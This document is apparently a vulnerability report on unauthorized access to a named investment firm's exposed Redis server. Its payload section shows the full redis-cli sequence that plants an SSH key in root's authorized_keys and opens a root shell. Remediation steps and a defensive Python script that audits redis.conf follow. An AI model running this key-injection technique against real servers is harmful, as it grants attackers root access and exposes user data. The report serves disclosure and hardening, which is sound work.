Unauthorized access to the Redis server of a financial investment company can cause a large amount of user information leakage.
0x00 Unauthorized access to the Redis server of Beijing Qianjing Fortune Investment Management
URL:
http://**.**.**.**
Problematic IP address:
**.**.**.**:6379
Payload:
root@kali:~/.ssh# cat foo.txt | redis-cli -h **.**.**.** -x set crackit
OK
root@kali:~/.ssh# redis-cli -h **.**.**.**
**.**.**.**:6379> config set dir /root/.ssh/
OK
**.**.**.**:6379> config get dir
1) "dir"
2) "/root/.ssh"
**.**.**.**:6379> config set dbfilename "authorized_keys"
OK
**.**.**.**:6379> save
OK
**.**.**.**:6379> quit
root@kali:~/.ssh# ssh -i id_rsa root@**.**.**.**
[root@web3 ~]#
0x02 Intranet
0x03 Database backup files
Solution:
1. Bind the Redis service to a specific network interface (Redis must be restarted for this to take effect)
In redis.conf, find the line "# bind **.**", remove the leading # and save the file. Note: after this change only the local machine can reach Redis.
2. Set an access password (Redis must be restarted for this to take effect)
Find the "requirepass" directive in redis.conf and set the password you want to use. Redis clients must then supply this password to access the service.
3. Change the account that runs the Redis service
Run the Redis service under a low-privilege account and disable that account's login. An attacker who reaches the service can still write files to disk as that account, and the Redis data can still be read or maliciously deleted.
4. Set firewall policies
If other servers legitimately need to reach the Redis service, add an iptables policy that allows only those specific IP addresses to connect to the Redis port.
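As a defender-side check for steps 1, 2 and 4 above, here is an added Python example (it is not part of the original report and not Redis project code). It parses a redis.conf the way Redis reads it (last occurrence of a directive wins, comment lines ignored), flags a missing or wildcard bind and a missing or short requirepass, and builds the iptables allow-list rules from step 4. The two sample configuration texts and the IP addresses are constructed for the example.

```python
"""Audit the settings the Redis hardening steps depend on: bind, requirepass, firewall."""
from typing import Dict, List

# Constructed sample: a default-style redis.conf where both directives are still commented out.
WEAK_CONF = """\
# bind 127.0.0.1
port 6379
# requirepass foobared
dir /var/lib/redis
"""

# Constructed sample: the same file after applying steps 1 and 2.
HARDENED_CONF = """\
bind 127.0.0.1
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
dir /var/lib/redis
"""


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Return active (uncommented) directives as lowercase keyword -> values in file order."""
    directives: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment: Redis ignores it
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        directives.setdefault(key, []).append(value)
    return directives


def audit_redis_conf(text: str) -> List[str]:
    """Return a list of findings; an empty list means steps 1 and 2 are in place."""
    findings: List[str] = []
    conf = parse_redis_conf(text)

    # Step 1: bind. If absent, Redis listens on every interface; a wildcard address is equivalent.
    binds = conf.get("bind")
    if not binds:
        findings.append("bind: not set; Redis listens on all interfaces")
    else:
        addrs = binds[-1].split()  # the last bind line wins; it may list several addresses
        wildcard = [a for a in addrs if a in ("0.0.0.0", "*", "::")]
        if wildcard:
            findings.append(f"bind: wildcard address {wildcard} exposes Redis to the network")

    # Step 2: requirepass. Unset means any client can run CONFIG SET / SAVE as in the payload above.
    pw_values = conf.get("requirepass")
    password = pw_values[-1].strip("\"'") if pw_values else ""
    if not password:
        findings.append("requirepass: not set; any client can run CONFIG SET / SAVE")
    elif len(password) < 16:
        findings.append("requirepass: password shorter than 16 characters")
    return findings


def iptables_allowlist(allowed_ips: List[str], port: int = 6379) -> List[str]:
    """Step 4: accept the Redis port only from the listed source IPs, drop everything else."""
    rules = [f"iptables -A INPUT -p tcp --dport {port} -s {ip} -j ACCEPT" for ip in allowed_ips]
    rules.append(f"iptables -A INPUT -p tcp --dport {port} -j DROP")
    return rules


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}] findings: {audit_redis_conf(conf) or 'none'}")
    # Constructed example: only one application server may reach Redis.
    print("\n".join(iptables_allowlist(["10.0.0.5"])))
```

Run the audit against the server's real redis.conf after editing it; step 3 (the service account) is not visible in the config file and has to be checked on the process itself.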